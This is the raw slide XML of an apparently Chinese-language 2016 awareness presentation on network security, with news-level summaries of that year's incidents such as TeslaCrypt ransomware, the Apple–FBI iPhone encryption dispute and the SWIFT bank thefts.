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7" r:id="rId3"/>
    <p:sldId id="269" r:id="rId4"/>
    <p:sldId id="270" r:id="rId5"/>
    <p:sldId id="276" r:id="rId6"/>
    <p:sldId id="275" r:id="rId7"/>
    <p:sldId id="274" r:id="rId8"/>
    <p:sldId id="271" r:id="rId9"/>
    <p:sldId id="273" r:id="rId10"/>
    <p:sldId id="272" r:id="rId11"/>
    <p:sldId id="281" r:id="rId12"/>
    <p:sldId id="280" r:id="rId13"/>
    <p:sldId id="279" r:id="rId14"/>
    <p:sldId id="278" r:id="rId15"/>
    <p:sldId id="292" r:id="rId16"/>
    <p:sldId id="293" r:id="rId17"/>
    <p:sldId id="294" r:id="rId18"/>
    <p:sldId id="277" r:id="rId19"/>
    <p:sldId id="312" r:id="rId20"/>
    <p:sldId id="314" r:id="rId21"/>
    <p:sldId id="307" r:id="rId22"/>
    <p:sldId id="287" r:id="rId23"/>
    <p:sldId id="309" r:id="rId24"/>
    <p:sldId id="313" r:id="rId25"/>
    <p:sldId id="296" r:id="rId26"/>
    <p:sldId id="298" r:id="rId27"/>
    <p:sldId id="299" r:id="rId28"/>
    <p:sldId id="300" r:id="rId29"/>
    <p:sldId id="285" r:id="rId30"/>
    <p:sldId id="302" r:id="rId31"/>
    <p:sldId id="311" r:id="rId32"/>
    <p:sldId id="301" r:id="rId33"/>
    <p:sldId id="304" r:id="rId34"/>
    <p:sldId id="28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2" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="83" d="100"/>
          <a:sy n="83" d="100"/>
        </p:scale>
        <p:origin x="-786"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3207129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219773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183397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77268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10362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2279190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884828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412488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94727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74526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30D00D5-D19F-4DFA-A331-0ED2DE7D2530}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2016/11/11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147442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D00D5-D19F-4DFA-A331-0ED2DE7D2530}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2016/11/11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882DB-58AF-48A6-B415-FBE8D109ECCB}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="122423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baike.baidu.com/view/677614.ht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hyperlink" Target="http://baike.baidu.com/view/16443.htm" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/subview/460250/460250.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/934.htm" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/5030.ht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baike.baidu.com/view/209503.htm" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/32853.htm" TargetMode="Externa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ideo" Target="../media/media1.mp4"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/media" Target="../media/media1.mp4"/></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hyperlink" Target="http://baike.baidu.com/view/1279152.htm"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www.zendai.com/complay.php?id=7"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文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1918156" y="1362436"/>
            <a:ext cx="8780654" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
              </a:rPr>
              <a:t>与网络安全有关的那些事</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="Heiti SC Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2552246" y="4335109"/>
            <a:ext cx="7512473" cy="812530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>城</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>管实习</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>大叔</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>蒙涛</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="Heiti SC Light"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="150460" y="146654"/>
            <a:ext cx="901664" cy="736360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2552245" y="5389771"/>
            <a:ext cx="7512473" cy="670120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2016</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>月</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="Heiti SC Light"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="277786610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文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1536598" y="846746"/>
            <a:ext cx="8597900" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【3】2016</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>安</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>全事件盘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1536598" y="1725027"/>
            <a:ext cx="4051402" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>勒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>索软件风头日</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>盛</a:t>
            </a:r>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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TeslaCrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>勒索软件瞄准的主要是游戏平台的玩家们，被盯上的游戏平台包括使命召唤、暗黑破坏神、异尘余生、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Minecraft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、魔兽争霸、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>F.E.A.R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、刺客信条、生化危机、魔兽世界、英雄联盟以及坦克世界等。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TeslaCrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Flash Player</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CVE-2015-0311</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）或者一个古老的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>浏览器漏洞将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TeslaCrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>勒索软件植入目标系统上。然后对受害者文件进行加密，勒索赎金</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9220" name="Picture 4" descr="https://pic1.zhimg.com/d5b70cbb3c174461ce0c86a8bb618f68_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28775" y="2096595"/>
            <a:ext cx="2422525" cy="138641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文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6730898" y="1725027"/>
            <a:ext cx="4203802" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>苹果“加密门”</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2015</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>月，美国加州圣贝纳迪诺（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>San Bernardino</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）发生了一起严重的恐怖袭击事件，被警察射杀的凶手</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Farook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>留下了一支被密码锁屏的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iPhone 5c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。这就是引起这场“加密之争”的导火索。回顾本次事件，我们可以概括为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FBI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>想要让苹果解锁一部恐怖分子的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iPhone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，但是遭到了拒绝。然后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FBI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>想通过法院来让苹果妥协，但是最终 在开庭的前一天，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FBI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>通过第三方的帮助成功解锁了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iPhone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，并放弃了起诉。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2" descr="https://pic4.zhimg.com/09088c0b5ddf44951ea49bbfa84c80f3_b.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26097" y="2096595"/>
            <a:ext cx="2451202" cy="16341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51996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6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1469037" y="1506727"/>
            <a:ext cx="4203802" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SWIFT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系统风波</a:t>
            </a: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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>从去年开始，世界范围内使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SWIFT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系统的银行相继被曝出盗窃案件，从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
